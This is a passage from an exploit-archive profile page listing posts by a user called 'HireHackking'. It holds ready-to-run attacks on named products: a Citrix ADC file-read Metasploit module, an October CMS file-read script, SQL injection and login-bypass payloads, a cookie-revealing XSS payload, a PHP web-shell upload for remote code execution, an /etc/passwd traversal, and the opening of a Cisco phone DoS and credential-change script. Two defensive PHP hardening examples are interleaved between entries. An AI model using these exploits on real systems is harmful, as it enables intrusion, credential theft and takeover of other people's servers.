
Everything posted by HireHackking
-
Citrix ADC NetScaler - Local File Inclusion (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Citrix ADC NetScaler - Local File Inclusion (Metasploit)',
      'Description' => %{
        The remote device is affected by multiple vulnerabilities.

        An authorization bypass vulnerability exists in Citrix ADC and NetScaler
        Gateway devices. An unauthenticated remote attacker with access to the
        `NSIP/management interface` can exploit this to bypass authorization
        (CVE-2020-8193).

        And Information disclosure (CVE-2020-8195 and CVE-2020-8196) - but at
        this time unclear which.
      },
      'Author' => [
        'Donny Maasland',               # Discovery
        'mekhalleh (RAMELLA Sébastien)' # Module author (Zeop Entreprise)
      ],
      'References' => [
        ['CVE', '2020-8193'],
        ['CVE', '2020-8195'],
        ['CVE', '2020-8196'],
        ['URL', 'https://dmaasland.github.io/posts/citrix.html'],
        ['URL', 'https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/amp/'],
        ['URL', 'https://github.com/jas502n/CVE-2020-8193']
      ],
      'DisclosureDate' => '2020-07-09',
      'License' => MSF_LICENSE,
      'DefaultOptions' => {
        'RPORT' => 443,
        'SSL' => true
      }
    ))

    register_options([
      OptEnum.new('MODE', [true, 'Start type.', 'discovery', [
        'discovery', 'interactive', 'sessions']]),
      OptString.new('PATH', [false, 'File or directory you want to read', '/nsconfig/ns.conf']),
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
  end

  def create_session
    params = 'type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1'
    request = {
      'method' => 'POST',
      'uri' => "#{normalize_uri(target_uri.path, 'pcidss', 'report')}?#{params}",
      'ctype' => 'application/xml',
      'headers' => {
        'X-NITRO-USER' => Rex::Text.rand_text_alpha(6..8),
        'X-NITRO-PASS' => Rex::Text.rand_text_alpha(6..8)
      },
      'data' => '<appfwprofile><login></login></appfwprofile>'
    }
    request = request.merge({'cookie' => @cookie}) if @cookie

    response = send_request_raw(request)
    unless response && response.code == 406
      print_error("#{@message_prefix} - No response to session request.")
      return
    end

    response.get_cookies
  end

  def fix_session_rand
    response = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'menu', 'ss'),
      'cookie' => @cookie,
      'vars_get' => {
        'sid' => 'nsroot',
        'username' => 'nsroot',
        'force_setup' => '1'
      }
    )

    if response && response.code == 302
      location = response.headers['location']

      response = send_request_cgi(
        'method' => 'GET',
        'uri' => location,
        'cookie' => @cookie
      )
      return unless response && response.code == 200
    end

    response.to_s.scan(/rand = "([^"]+)"/).join
  end

  def read_lfi(path, var_rand)
    params = "filter=path:#{path}"
    request = {
      'method' => 'POST',
      'uri' => "#{normalize_uri(target_uri.path, 'rapi', 'filedownload')}?#{params}",
      'cookie' => @cookie,
      'ctype' => 'application/xml',
      'headers' => {
        'X-NITRO-USER' => Rex::Text.rand_text_alpha(6..8),
        'X-NITRO-PASS' => Rex::Text.rand_text_alpha(6..8),
        'rand_key' => var_rand
      },
      'data' => '<clipermission></clipermission>'
    }

    response = send_request_raw(request)
  end

  def run_host(ip)
    proto = (datastore['SSL'] ? 'https' : 'http')
    @message_prefix = "#{proto}://#{ip}:#{datastore['RPORT']}"

    @cookie = create_session
    if @cookie && @cookie =~ /SESSID/
      print_status("#{@message_prefix} - Got session: #{@cookie.split(' ')[0]}")

      var_rand = fix_session_rand
      unless var_rand
        print_error("#{@message_prefix} - Unable to get rand value.")
        return Exploit::CheckCode::Unknown
      end
      print_status("#{@message_prefix} - Got rand: #{var_rand}")

      print_status("#{@message_prefix} - Re-breaking session...")
      create_session

      case datastore['MODE']
      when /discovery/
        response = read_lfi('/etc/passwd'.gsub('/', '%2F'), var_rand)
        if response.code == 406
          if response.body.include? ('root:*:0:0:')
            print_warning("#{@message_prefix} - Vulnerable.")
            return Exploit::CheckCode::Vulnerable
          end
        end
      when /interactive/
        # TODO: parse response
        response = read_lfi(datastore['PATH'].gsub('/', '%2F'), var_rand)
        if response.code == 406
          print_line("#{response.body}")
        end
        return
      when /sessions/
        # TODO: parse response
        response = read_lfi('/var/nstmp'.gsub('/', '%2F'), var_rand)
        if response.code == 406
          print_line("#{response.body}")
        end
        return
      end
    end

    print_good("#{@message_prefix} - Not Vulnerable.")
    return Exploit::CheckCode::Safe
  end

end
-
DigitalPersona 5.1.0.656 'DpHostW' - Unquoted Service Path
# Exploit Title: DigitalPersona 5.1.0.656 'DpHostW' - Unquoted Service Path
# Discovery by: Teresa Q
# Discovery Date: 2020-11-11
# Vendor: DigitalPersona U. are U. One Touch
# Version: 5.1.0.656
# Vulnerability Type: Unquoted Service Path
# Vendor Homepage: https://www.hidglobal.com/crossmatch
# Tested on OS: Windows 10 Home x64 es

# Analyze PoC:
==============

C:\>sc qc "DpHost"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: DpHost
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\DigitalPersona\Bin\DpHostW.exe
        GRUPO_ORDEN_CARGA  : BiometricGroup
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Servicio de autenticación biométrica
        DEPENDENCIAS       : RPCSS
        NOMBRE_INICIO_SERVICIO: LocalSystem

C:\>
-
Touchbase.io 1.10 - Stored Cross Site Scripting
# Exploit Title: Touchbase.io 1.10 - Stored Cross Site Scripting
# Date: 2020-11-11
# Exploit Author: Simran Sankhala
# Vendor Homepage: https://touchbase.ai/
# Software Link: https://touchbase.ai/
# Version: 1.1.0
# Tested on: Windows 10

# Proof Of Concept:

The touchbase.ai application allows stored XSS via the 'Add User' module; the stored payload is rendered whenever the 'Contacts' page is visited.

Steps to Reproduce:

1. Log in to the application, go to the 'Contacts' module and add a user.
2. Inject the payload <marquee onstart=alert(document.cookie)> in the 'Name' field.
3. Fill in the other details and save them.
4. Go to the 'Contacts' module again: the injected script executes in the name field and a pop-up appears showing the session cookie.
-
SAntivirus IC 10.0.21.61 - 'SAntivirusIC' Unquoted Service Path
# Exploit Title: SAntivirus IC 10.0.21.61 - 'SAntivirusIC' Unquoted Service Path
# Discovery by: Mara Ramirez
# Discovery Date: 10-11-2020
# Vendor Homepage: https://www.segurazo.com/download.html
# Software Links: https://www.segurazo.com/download.html
# Tested Version: 10.0.21.61
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Home Single Language

# Step to discover Unquoted Service Path:

C:\>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
SAntivirusIC   SAntivirusIC   C:\Program Files (x86)\Digital Communications\SAntivirus\SAntivirusIC.exe -service   Auto

C:\>sc qc SAntivirusIC
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: SAntivirusIC
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Digital Communications\SAntivirus\SAntivirusIC.exe -service
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : SAntivirusIC
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem
-
October CMS Build 465 - Arbitrary File Read Exploit (Authenticated)
# Exploit Title: October CMS Build 465 - Arbitrary File Read Exploit (Authenticated)
# Date: 2020-03-31
# Exploit Author: Sivanesh Ashok
# Vendor Homepage: https://octobercms.com/
# Version: Build 465 and below
# Tested on: Windows 10 / XAMPP / October CMS Build 465
# CVE: CVE-2020-5295

echo '''
Authenticated arbitrary file read exploit for October CMS <= Build 465
Tested on: v1.0.45
'''

rm /tmp/ocms_* &> /dev/null

if [[ ! `command -v recode` ]]; then
    echo -e "[!] Missing package 'recode'\n[!] Install 'recode' using the respective command to resume\n\tsudo apt install recode\n\tsudo pacman -S recode\n\tyum install recode"
    echo -e "[*] Exiting!\n"
    exit 0
fi

read -p "[*] Enter target host (with http/https): " host
echo ""
read -p "[*] Enter your cookie value: " cookie

curl -s -X GET -H "Cookie: $cookie" "$host/backend/cms" > /tmp/ocms_gethtml

if [[ ! `awk '/<span class="nav-label">/,/<\/span>/' /tmp/ocms_gethtml | grep "Assets"` ]]; then
    echo -e "[-] Invalid cookie\n[-] Either the user does not have the privilege to modify assets or the cookie is invalid"
    echo -e "[*] Exiting!\n"
    exit 0
fi

echo '''
[!] Relative path to the target file is required.
    eg. config/database.php
    If you are unsure about the path, check OctoberCMS github which has the default file system hosted
    https://github.com/octobercms/october
'''

read -p "[*] Enter path to the target file: " targetfile

themename=`grep "data-item-theme" /tmp/ocms_gethtml -m 1 | awk -F'"' '{print $6}'`
csrftoken=`grep "csrf-token" /tmp/ocms_gethtml | awk -F'"' '{print $4}'`

curl -s -X POST -H "Cookie: $cookie" -H "X-CSRF-TOKEN: $csrftoken" -H "X-OCTOBER-REQUEST-HANDLER: onOpenTemplate" -H "X-Requested-With: XMLHttpRequest" -d "theme=$themename" -d "type=asset" -d "path=../../../$targetfile" "$host/backend/cms" > /tmp/ocms_jsonres

cat /tmp/ocms_jsonres | jq -r '.tab' 2> /dev/null | awk '/<textarea/,/<\/textarea>/' 2> /dev/null | recode html > /tmp/ocms_file 2> /dev/null

if [[ `cat /tmp/ocms_file` ]]; then
    cp /tmp/ocms_file ./october_extractedfile
    echo -e "\n[+] File saved as ./october_extractedfile!\n"
    exit 1
else
    echo -e "\n[-] Error extracting file. Check /tmp/ocms_jsonres for the server response. Exiting!\n"
    exit 0
fi
-
OpenCart Theme Journal 3.1.0 - Sensitive Data Exposure
# Exploit Title: OpenCart Theme Journal 3.1.0 - Sensitive Data Exposure
# Date: 11-06-2020
# Vendor Homepage: https://www.journal-theme.com/
# Vendor Changelog: https://docs.journal-theme.com/changelog
# Exploit Author: Jinson Varghese Behanan (@JinsonCyberSec)
# Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/sql-errors-data-exposure-in-journal-opencart-theme/
# Version: 3.0.46 and below
# CVE: CVE-2020-15478

1. Description

Journal, the best-selling OpenCart theme, used on over 25K websites, was found to expose sensitive information and to be potentially vulnerable to further attacks such as SQL injection. Sensitive Data Exposure, an OWASP Top 10 category, occurs when an application fails to adequately protect sensitive data; the information exposed can include passwords, session tokens, credit card data, private health data and more.

2. Vulnerability

Because of the way the "page" parameter is typecast to an integer in /catalog/controller/journal3/blog.php, supplying a string produces a detailed error message that reveals the SQL error, database details and the internal path. Such information helps an attacker prepare further attacks. In the mentioned file, $page is cast to an integer with:

$page = (int)Arr::get($this->request->get, 'page', 1);

All OpenCart websites using the Journal theme version 3.0.46 and below are affected.

3. Timeline

Vulnerability reported to the Journal team: June 11, 2020
Journal Theme version 3.1.0 containing the fix released: July 1, 2020
-
IDT PC Audio 1.0.6425.0 - 'STacSV' Unquoted Service Path
# Exploit Title: IDT PC Audio 1.0.6425.0 - 'STacSV' Unquoted Service Path
# Discovery by: Isabel Lopez
# Software link: https://www.pconlife.com/download/otherfile/20566/098185e9b7c417cf7480bb9f839db652/
# Discovery Date: 2020-11-07
# Tested Version: 1.0.6425.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 x64 es

# Step to discover Unquoted Service Path:

C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" |findstr /i /v "C:\Windows\\" | findstr /i /v """
Audio service   STacSV   c:\Program Files\IDT\WDM\STacSV64.exe   Auto

# Service info:

c:\>sc qc STacSV
[SC] QueryServiceConfig SUCCES

SERVICE_NAME: STacSV
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : c:\Program Files\IDT\WDM\STacSV64.exe
        LOAD_ORDER_GROUP   : AudioGroup
        TAG                : 0
        DISPLAY_NAME       : Audio Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
-
Pandora FMS 7.0 NG 749 - 'CG Items' SQL Injection (Authenticated)
# Exploit Title: Pandora FMS 7.0 NG 749 - 'CG Items' SQL Injection (Authenticated)
# Date: 11-14-2020
# Exploit Author: Matthew Aberegg, Alex Prieto
# Vendor Homepage: https://pandorafms.com/
# Patch Link: https://github.com/pandorafms/pandorafms/commit/1258a1a63535f60924fb69b1f7812c678570cc8e
# Software Link: https://pandorafms.com/community/get-started/
# Version: Pandora FMS 7.0 NG 749
# Tested on: Ubuntu 18.04

# Vulnerability Details
# Description: A blind SQL injection vulnerability exists in the "CG Items" functionality of Pandora FMS.
# Vulnerable Parameter: data

# POC

POST /pandora_console/ajax.php?data=(SELECT+1+FROM+(SELECT(SLEEP(5)))A) HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 23
Origin: http://TARGET
Connection: close
Referer: http://TARGET/pandora_console/index.php?sec=eventos&sec2=operation/events/events
Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3

page=general%2Fcg_items
-
Advanced System Care Service 13 - 'AdvancedSystemCareService13' Unquoted Service Path
# Title: Advanced System Care Service 13 - 'AdvancedSystemCareService13' Unquoted Service Path
# Author: Jair Amezcua
# Date: 2020-11-10
# Vendor Homepage: https://www.iobit.com
# Software Link: https://www.iobit.com/es/advancedsystemcarepro.php
# Version: 13.0.0.157
# Tested on: Windows 10 64bit (EN)
# CVE: N/A

# 1. Description:
# Advanced System Care Service 13 v13.0.0.157 has an unquoted service path.

# PoC
===========

C:\>sc qc AdvancedSystemCareService13
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: AdvancedSystemCareService13
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Advanced SystemCare Pro\ASCService.exe
        LOAD_ORDER_GROUP   : System Reserved
        TAG                : 0
        DISPLAY_NAME       : Advanced SystemCare Service 13
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

# Description Exploit:
# A successful attempt would require the local user to be able to insert their code in the system root path
# undetected by the OS or other security applications where it could potentially be executed during
# application startup or reboot. If successful, the local user's code would execute with the elevated
# privileges of the application.
-
Water Billing System 1.0 - 'id' SQL Injection (Authenticated)
# Exploit Title: Water Billing System 1.0 - 'id' SQL Injection (Authenticated)
# Date: 2020-11-14
# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
# Author ID: 8763
# Vendor: https://www.sourcecodester.com/php/14560/water-billing-system-phpmysqli-full-source-code.html
# Version: 1.0
# Tested on: Apache2 and Windows 10

Vulnerable param: id
-------------------------------------------------------------------------
GET /WBS/edituser.php?id=-9%27+UNION+SELECT+1,@@VERSION,3,4--%20- HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/WBS/user.php
Cookie: setting=k; PHPSESSID=tsimparo2crmq2ibibnla5vean
-------------------------------------------------------------------------

Source Code: edituser.php
..
..
..
$user_id =$_REQUEST['id'];
$result = mysqli_query($conn,"SELECT * FROM user WHERE id = '$user_id'");
..
..
-------------------------------

Vulnerable param: id
-------------------------------------------------------------------------
GET /WBS/viewbill.php?id=2%27+union+select+1,2,3,@@version,5,6--+- HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 163
Origin: http://localhost
Connection: close
Cookie: COOKIE
Upgrade-Insecure-Requests: 1
-------------------------------------------------------------------------

Source Code: \WBS\viewbill.php
..
..
..
$id =$_REQUEST['id'];
$result = mysqli_query($conn,"SELECT * FROM bill where owners_id='$id'");
..
..
-------------------------------
-
KiteService 1.2020.1113.1 - 'KiteService.exe' Unquoted Service Path
# Exploit Title: KiteService 1.2020.1113.1 - 'KiteService.exe' Unquoted Service Path
# Discovery by: IRVIN GIL
# Discovery Date: 2020-11-14
# Vendor Homepage: https://www.kite.com/
# Tested Version: 1.2020.1113.1
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 x64 es

# Step to discover Unquoted Service Path:

C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
KiteService   KiteService   C:\Program Files\Kite\KiteService.exe   Auto

# Service info:

C:\>sc qc "KiteService"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: KiteService
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 0   IGNORE
        NOMBRE_RUTA_BINARIO: C:\Program Files\Kite\KiteService.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : KiteService
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem

# Exploit:
# A successful attempt would require the local user to be able to insert their code in the system root path
# undetected by the OS or other security applications where it could potentially be executed during
# application startup or reboot. If successful, the local user's code would execute with the elevated
# privileges of the application.
-
Logitech Solar Keyboard Service - 'L4301_Solar' Unquoted Service Path
# Title: Logitech Solar Keyboard Service - 'L4301_Solar' Unquoted Service Path
# Author: Jair Amezcua
# Date: 2020-11-10
# Vendor Homepage: https://www.logitech.com/es-mx
# Software Link: https://support.logi.com/hc/en-us/articles/360024692874--Downloads-Wireless-Solar-Keyboard-K750
# Version: 1.10.3.0
# Tested on: Windows 10 64bit (EN)
# CVE: N/A

# 1. Description:
# Logitech Solar Keyboard Service v1.10.3.0 has an unquoted service path.

# PoC
===========

C:\>sc qc L4301_Solar
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: L4301_Solar
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Logitech\SolarApp\L4301_Solar.exe
        LOAD_ORDER_GROUP   : PlugPlay
        TAG                : 0
        DISPLAY_NAME       : Logitech Solar Keyboard Service
        DEPENDENCIES       : PlugPlay
        SERVICE_START_NAME : LocalSystem

# Description Exploit:
# A successful attempt would require the local user to be able to insert their code in the system root path
# undetected by the OS or other security applications where it could potentially be executed during
# application startup or reboot. If successful, the local user's code would execute with the elevated
# privileges of the application.
-
User Registration & Login and User Management System 2.1 - Login Bypass SQL Injection
# Exploit Title: User Registration & Login and User Management System 2.1 - Login Bypass SQL Injection
# Date: 2020-11-14
# Exploit Author: Mayur Parmar (th3cyb3rc0p)
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
# Version: 2.1
# Tested on: POPOs (Linux)

SQL Injection:
SQL injection is a web security vulnerability that allows an attacker to alter the SQL queries made to the database. This can be used to retrieve sensitive information such as the database structure, tables, columns and their underlying data.

Attack Vector:
An attacker can gain admin panel access using malicious SQL injection queries.

Steps to reproduce:
1. Open the admin login page using the following URL:
   -> http://localhost/loginsystem/admin/
2. Put the payload below in both fields (User ID & Password):
   Payload: ' or '1'='1
3. The server accepts the payload and the admin panel is reached without any credentials.

IMPACT:
If an attacker gains admin panel access, they can update and delete user data.

Suggested Mitigation/Remediation Actions:
Parameterized queries should be used to separate the command and data portions of the intended query to the database. These queries prevent an attacker from tampering with the query logic and extending a concatenated database query string. Code reviews should be conducted to identify any additional areas where the application, or other applications in the organization, are vulnerable to this attack. Additionally, input validation should be enforced on the server side to ensure that only expected data is sent in queries. Where possible, security-specific libraries should be used to provide an additional layer of protection.
-
PMB 5.6 - 'chemin' Local File Disclosure
# Exploit Title: PMB 5.6 - 'chemin' Local File Disclosure
# Date: 2020-10-13
# Google Dork: inurl:opac_css
# Exploit Author: 41-trk (Tarik Bakir)
# Vendor Homepage: http://www.sigb.net
# Software Link: http://forge.sigb.net/redmine/projects/pmb/files
# Affected versions: <= 5.6
# Tested on: Ubuntu 18.04.1

PMB's GIF image handler (getgif.php) does not sanitize the 'chemin' parameter, which leads to Local File Disclosure. As of today (2020-10-13) this issue is unfixed.

Vulnerable code: (getgif.php)

line 55   $fp2=@fopen($chemin, "rb");
line 68   fpassthru($fp)

========================= Proof-of-Concept ===================================================

http://127.0.0.1:2121/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik
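A defensive replacement for the fopen($chemin, "rb") pattern quoted above, added here as an example (it is not PMB project code): the requested name is resolved with realpath() and must land inside a fixed image directory before anything is streamed. The image directory, the accepted extensions and the caller's use of $_GET['chemin'] are assumptions.

```php
<?php
// Added example, not PMB code. Containment check for a user-supplied file name
// before it is opened and streamed the way getgif.php does.

declare(strict_types=1);

/**
 * Resolve $requested against $baseDir and return the absolute path only when it
 * is a regular image file inside $baseDir. Returns null for traversal, symlink
 * escapes, missing files and non-image extensions.
 */
function safeImagePath(string $baseDir, string $requested): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses ../ segments and resolves symlinks; it returns false
    // when the file does not exist, which already rejects most probing.
    $target = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($target === false || !is_file($target)) {
        return null;
    }
    // The resolved path must start with base + separator, so a sibling such as
    // /var/www/images2/x cannot pass for base /var/www/images.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    // Only serve image types: /etc/passwd has no image extension even if it
    // somehow sat inside the directory.
    $ext = strtolower(pathinfo($target, PATHINFO_EXTENSION));
    if (!in_array($ext, ['gif', 'png', 'jpg', 'jpeg'], true)) {
        return null;
    }
    return $target;
}

/** Stream the file as getgif.php does, but only after the check above. */
function serveImage(string $baseDir, string $requested): void
{
    $path = safeImagePath($baseDir, $requested);
    if ($path === null) {
        http_response_code(404);   // no error detail about why it was refused
        return;
    }
    header('Content-Type: ' . mime_content_type($path));
    $fp = fopen($path, 'rb');
    fpassthru($fp);
    fclose($fp);
}

// Usage (assumed directory): serveImage(__DIR__ . '/images', $_GET['chemin'] ?? '');
// "../../../../../../etc/passwd" resolves outside the base directory and yields 404.
```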
-
Car Rental Management System 1.0 - Remote Code Execution (Authenticated)
# Exploit Title: Car Rental Management System 1.0 - Remote Code Execution (Authenticated)
# Date: 2020-11-13
# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
# Author ID: 8763
# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Apache2 - Windows 10

Vulnerable param: img
-------------------------------------------------------------------------
POST /car_rental/admin/ajax.php?action=save_settings HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------30709612614161811513297969444
Content-Length: 777
Origin: http://localhost
Connection: close
Referer: http://localhost/car_rental/admin/index.php?page=site_settings
Cookie: setting=k; PHPSESSID=tsimparo2crmq2ibibnla5vean

-----------------------------30709612614161811513297969444
Content-Disposition: form-data; name="name"

Car Rental Management System
-----------------------------30709612614161811513297969444
Content-Disposition: form-data; name="email"

info@sample.comm
-----------------------------30709612614161811513297969444
Content-Disposition: form-data; name="contact"

+6948 8542 623
-----------------------------30709612614161811513297969444
Content-Disposition: form-data; name="about"

content
-----------------------------30709612614161811513297969444
Content-Disposition: form-data; name="img"; filename="k.php"
Content-Type: application/octet-stream

<?php echo passthru($_GET['k']);?>
-----------------------------30709612614161811513297969444--

Source Code: admin\admin_class.php:
--------------------------------------------------------------------
if($_FILES['img']['tmp_name'] != ''){
    $fname = strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name'];
    $move = move_uploaded_file($_FILES['img']['tmp_name'],'assets/uploads/'. $fname);
    $data .= ", avatar = '$fname' ";
}
--------------------------------------------------------------------

POC: http://{site}/admin/assets/uploads/{FILE}.php?k=whoami
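A hardened version of the admin_class.php upload block above, added as an example and not taken from the Car Rental Management System: the client-supplied file name and Content-Type are ignored, the bytes must decode as an image, and the stored name is chosen by the server. The upload directory, size cap and the surrounding save_settings code are assumptions.

```php
<?php
// Added example, not Car Rental Management System code. Replacement for the
// move_uploaded_file() block that trusted $_FILES['img']['name'].

declare(strict_types=1);

/**
 * Validate an uploaded avatar and move it into $uploadDir.
 * Returns the stored file name, or null when the upload is rejected.
 */
function storeAvatar(array $file, string $uploadDir): ?string
{
    // Only a genuine, error-free upload is considered.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    if ($file['size'] > 2 * 1024 * 1024) {   // assumed 2 MiB cap
        return null;
    }
    // Decide the type from the bytes, never from the name or Content-Type:
    // a PHP file such as k.php is not an image, so getimagesize() fails on it.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false) {
        return null;
    }
    $extByMime = [
        'image/jpeg' => 'jpg',
        'image/png'  => 'png',
        'image/gif'  => 'gif',
    ];
    $ext = $extByMime[$info['mime']] ?? null;
    if ($ext === null) {
        return null;
    }
    // Server-chosen name: no attacker-controlled text reaches the path or,
    // later, the SQL statement that records the avatar.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($uploadDir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    chmod($dest, 0644);
    return $name;
}

// Usage inside save_settings, replacing the original block (assumed names):
// $fname = storeAvatar($_FILES['img'] ?? [], 'assets/uploads');
// if ($fname !== null) {
//     // bind $fname as a parameter instead of ", avatar = '$fname' "
// }
```

Pair this with a web-server rule that refuses to execute scripts from the upload directory (for mod_php, `php_admin_flag engine Off` in a `<Directory>` block for assets/uploads), so that even a bypass of the checks above yields no code execution.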
-
Atheros Coex Service Application 8.0.0.255 - 'ZAtheros Bt&Wlan Coex Agent' Unquoted Service Path
# Exploit Title: Atheros Coex Service Application 8.0.0.255 - 'ZAtheros Bt&Wlan Coex Agent' Unquoted Service Path
# Exploit Author: Isabel Lopez
# Exploit Date: 2020-11-13
# Vendor Homepage: https://www.file.net/process/ath_coexagent.exe.html
# Link Software: https://www.boostbyreason.com/resource-file-9102-ath_coexagent-exe.aspx
# Tested on OS: Windows 8.1 (64bits)

# 1. Description
# Atheros Coex Service Application 8.0.0.255 has an unquoted service path.

# 2. PoC

C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /V "C:\Windows" | findstr /i /V """"
ZAtheros Bt&Wlan Coex Agent   ZAtheros Bt&Wlan Coex Agent   C:\Program Files (x86)\Bluethooth Suite\Aht_CoexAgent.exe   Auto

C:\>sc qc WCAssistantService
[SC] QueryServiceConfig SUCCES

SERVICE_NAME: WCAssistantService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Bluethooth Suite\Aht_CoexAgent.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ZAtheros Bt&Wlan Coex Agent
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
-
Cisco 7937G - DoS/Privilege Escalation
# Exploit Title: Cisco 7937G 1-4-5-7 - DoS/Privilege Escalation
# Date: 2020-08-10
# Exploit Author: Cody Martin
# Vendor Homepage: https://cisco.com
# Version: <=SIP-1-4-5-7
# Tested On: SIP-1-4-5-5, SIP-1-4-5-7

#!/usr/bin/python
import sys
import getopt
import requests
import paramiko
import socket
import os


def main(argv):
    target = ""
    attack = ""
    username = ""
    password = ""
    finished = 0  # default so an unrecognised attack type reports failure instead of raising NameError
    divider = "=============================================="
    help_text = '''
exploit.py -t/--target ip-address-of-target -a/--attack attack-type [-u/--user username -p/--password password]
%s
Example: exploit.py -t 192.168.1.200 -a 1
Example: exploit.py --target 192.168.1.200 --attack 3 --user bob --password villa
%s
Attack types:
1: DoS with automatic device reset
2: DoS without automatic device reset
3: Change SSH credentials of target device
''' % (divider, divider)

    if len(sys.argv) == 1:
        print(help_text)
        sys.exit(2)
    try:
        opts, args = getopt.getopt(argv, "ht:a:u:p:", ["help", "target=", "attack=", "user=", "password="])
    except getopt.GetoptError:
        print(help_text)
        sys.exit(2)
    for opt, arg in opts:
        if opt == "-h":
            print(help_text)
            sys.exit()
        elif opt in ("-t", "--target"):
            target = arg
        elif opt in ("-a", "--attack"):
